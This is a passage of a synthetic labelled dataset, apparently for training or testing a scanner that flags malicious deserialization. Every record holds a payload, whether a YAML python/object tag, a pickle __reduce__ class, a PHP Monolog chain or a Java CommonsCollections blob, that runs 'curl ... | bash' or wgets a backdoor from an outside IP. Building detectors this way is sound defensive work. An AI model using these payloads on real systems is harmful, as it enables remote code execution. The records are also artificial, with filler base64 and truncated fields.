"source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://191.49.195.211/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://115.152.44.247/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://191.49.195.211/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://115.152.44.247/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00253", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('gaxZLbeOcwPxGj5iqLvMdF/rtqiUOTggFuheS7VsHk9xjp2UkvsPbskIWdX4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://113.51.168.224/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('gaxZLbeOcwPxGj5iqLvMdF/rtqiUOTggFuheS7VsHk9xjp2UkvsPbskIWdX4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00254", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://178.171.178.142/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://6.255.16.106/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://178.171.178.142/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://6.255.16.106/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00255", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"JW/bUF+yny2PVnNMLqe9+R7T9tP33BAtA1iEPTCN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://64.147.223.67/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"JW/bUF+yny2PVnNMLqe9+R7T9tP33BAtA1iEPTCN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://64.147.223.67/bd\")"}}]} {"id": "synth_malicious_deserialization_00256", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://94.246.132.71/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://94.246.132.71/shell\")"}}]} {"id": "synth_malicious_deserialization_00257", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://218.162.145.235/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://164.41.145.151/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://218.162.145.235/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://164.41.145.151/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00258", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:52:\"lokVCjB1pA6hkjUisXPi+DByK30/oCP/M1SRS/vx\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://192.1.205.207/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:52:\"lokVCjB1pA6hkjUisXPi+DByK30/oCP/M1SRS/vx\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://192.1.205.207/bd\")"}}]} {"id": "synth_malicious_deserialization_00259", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://241.220.157.208/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://241.220.157.208/shell\")"}}]} {"id": "synth_malicious_deserialization_00260", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('afDgGum+FDsFgcHzIKU7+57/6+7LKvPVWXMr8XNSUM6Adn7zoW5GFksG4Cw2')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://7.103.215.128/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('afDgGum+FDsFgcHzIKU7+57/6+7LKvPVWXMr8XNSUM6Adn7zoW5GFksG4Cw2')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00261", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"4UzeFYBIrm0+3u5rxhSdbBkjDQ9DVJEvoCn/NChQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://231.226.90.235/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"4UzeFYBIrm0+3u5rxhSdbBkjDQ9DVJEvoCn/NChQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://231.226.90.235/bd\")"}}]} {"id": "synth_malicious_deserialization_00262", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('I9Hgjhqqo7hQLPu8Xwz9SjlkOzF+1emKWAnHkmrRT5ks8hcrsiNOvr8jv/Jw')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://101.120.253.30/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('I9Hgjhqqo7hQLPu8Xwz9SjlkOzF+1emKWAnHkmrRT5ks8hcrsiNOvr8jv/Jw')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00263", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://50.10.52.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://249.5.2.154/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://50.10.52.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://249.5.2.154/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00264", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://38.156.111.218/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.222.103.59/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://38.156.111.218/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.222.103.59/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00265", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('TghenTcKGgiadKYJ8yiniLd2o4vTMbG/bP8jju+4iwiGidExIKuTyP2m5Yv9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://10.216.190.215/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('TghenTcKGgiadKYJ8yiniLd2o4vTMbG/bP8jju+4iwiGidExIKuTyP2m5Yv9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00266", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('F+ADEfhyMioPjnbzqhPWaf7PHyHB0JkWAntnlJvw4KJ2oogrXj7Ys/8d/RM8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://101.84.249.32/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('F+ADEfhyMioPjnbzqhPWaf7PHyHB0JkWAntnlJvw4KJ2oogrXj7Ys/8d/RM8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00267", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://231.203.137.200/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://236.179.101.65/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://231.203.137.200/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://236.179.101.65/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00268", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:56:\"rccx/C4gYtFaqnnP5d5lbwrPvHi5YIhLvtFKnBhU\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://222.87.22.105/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:56:\"rccx/C4gYtFaqnnP5d5lbwrPvHi5YIhLvtFKnBhU\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://222.87.22.105/bd\")"}}]} {"id": "synth_malicious_deserialization_00269", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('rRsK4yUqTlM8dASpTT+p1LDrZFX9XzBCXnpaESFjH18Pre1CXMRs9G0XmcPY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://19.78.88.103/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('rRsK4yUqTlM8dASpTT+p1LDrZFX9XzBCXnpaESFjH18Pre1CXMRs9G0XmcPY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00270", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://24.120.213.73/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://24.120.213.73/shell\")"}}]} {"id": "synth_malicious_deserialization_00271", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://54.226.141.137/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://28.230.34.240/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://54.226.141.137/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://28.230.34.240/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00272", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"x3mLfDg0WCPWlVU7MLKUIlw1yPrOVsLlTdho96o4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://122.169.22.128/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"x3mLfDg0WCPWlVU7MLKUIlw1yPrOVsLlTdho96o4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://122.169.22.128/bd\")"}}]} {"id": "synth_malicious_deserialization_00273", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://165.55.108.94/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://165.55.108.94/shell\")"}}]} {"id": "synth_malicious_deserialization_00274", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://51.244.12.139/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://51.244.12.139/shell\")"}}]} {"id": "synth_malicious_deserialization_00275", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://136.142.168.156/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://136.142.168.156/shell\")"}}]} {"id": "synth_malicious_deserialization_00276", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:79:\"cnarP4CDgarkDGLUxI8p9a83d5jt8RfR9VdGDwrb\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://75.88.255.121/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:79:\"cnarP4CDgarkDGLUxI8p9a83d5jt8RfR9VdGDwrb\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://75.88.255.121/bd\")"}}]} {"id": "synth_malicious_deserialization_00277", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://177.201.109.62/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.140.96.41/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://177.201.109.62/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.140.96.41/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00278", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://91.220.187.73/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://91.220.187.73/shell\")"}}]} {"id": "synth_malicious_deserialization_00279", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('hw1ucWNad2Sagqa2AtiOuzyZYf5X2eTkYj5yIMPMI8Eky7StlPHAUdSDj+Mq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://222.200.69.242/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('hw1ucWNad2Sagqa2AtiOuzyZYf5X2eTkYj5yIMPMI8Eky7StlPHAUdSDj+Mq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00280", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:50:\"7X6sXRWC9y0ALj4at1M/803vPplwR53GjesFirg8\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://254.0.180.160/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:50:\"7X6sXRWC9y0ALj4at1M/803vPplwR53GjesFirg8\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://254.0.180.160/bd\")"}}]} {"id": "synth_malicious_deserialization_00281", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://74.62.165.117/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://74.62.165.117/shell\")"}}]} {"id": "synth_malicious_deserialization_00282", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Lm8TRg4RFwcplhWrOhGltBu8XPssld0S1+8kPT7Lf7SYcrkMdK1uJNpg811/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://180.241.33.157/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Lm8TRg4RFwcplhWrOhGltBu8XPssld0S1+8kPT7Lf7SYcrkMdK1uJNpg811/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00283", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('iYDLtOoGXPXmhKBSyTzw4qCW5KAUJD4zRHq+VrhYwfHrSCIV/8ZSATj79ZOL')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://250.184.135.127/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('iYDLtOoGXPXmhKBSyTzw4qCW5KAUJD4zRHq+VrhYwfHrSCIV/8ZSATj79ZOL')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00284", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('WhZaqkWeV2qiupAOzBu5jB//NKWhYw6h0y7AvTRg/8uQtZCeU8FDJxcagLqp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://139.229.142.208/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('WhZaqkWeV2qiupAOzBu5jB//NKWhYw6h0y7AvTRg/8uQtZCeU8FDJxcagLqp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00285", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:34:\"mMZE68c3it3oYBtyinpRVb59w0tGlVIL5Dc0/aEK\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://186.168.48.243/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:34:\"mMZE68c3it3oYBtyinpRVb59w0tGlVIL5Dc0/aEK\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://186.168.48.243/bd\")"}}]} {"id": "synth_malicious_deserialization_00286", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('f81KHcYEargxFXCuySWz071MH3S6CHQup14rCHnU6XhtM72qmO15P0VAY/qO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://83.48.40.246/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('f81KHcYEargxFXCuySWz071MH3S6CHQup14rCHnU6XhtM72qmO15P0VAY/qO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00287", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://197.14.192.58/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://197.14.192.58/shell\")"}}]} {"id": "synth_malicious_deserialization_00288", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:31:\"q2dLBobRhWyK/fozTxZRf9I3B9/ELj6AW68EhZ30\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://250.125.10.186/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:31:\"q2dLBobRhWyK/fozTxZRf9I3B9/ELj6AW68EhZ30\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://250.125.10.186/bd\")"}}]} {"id": "synth_malicious_deserialization_00289", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:35:\"iiWaljLDHmOcXf2c2GO1R9zjzF2/GD+AhMT9A0Wp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://48.243.157.29/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:35:\"iiWaljLDHmOcXf2c2GO1R9zjzF2/GD+AhMT9A0Wp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://48.243.157.29/bd\")"}}]} {"id": "synth_malicious_deserialization_00290", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:43:\"cbCCi+M6+DGxW7+L4ZHlcp62WZNdxTcW4FPC1TOp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://42.140.159.242/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:43:\"cbCCi+M6+DGxW7+L4ZHlcp62WZNdxTcW4FPC1TOp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://42.140.159.242/bd\")"}}]} {"id": "synth_malicious_deserialization_00291", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://87.242.90.179/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://87.242.90.179/shell\")"}}]} {"id": "synth_malicious_deserialization_00292", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://152.184.189.223/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://152.184.189.223/shell\")"}}]} {"id": "synth_malicious_deserialization_00293", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://169.6.183.118/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://219.119.190.210/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://169.6.183.118/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://219.119.190.210/backdoor', '-O', 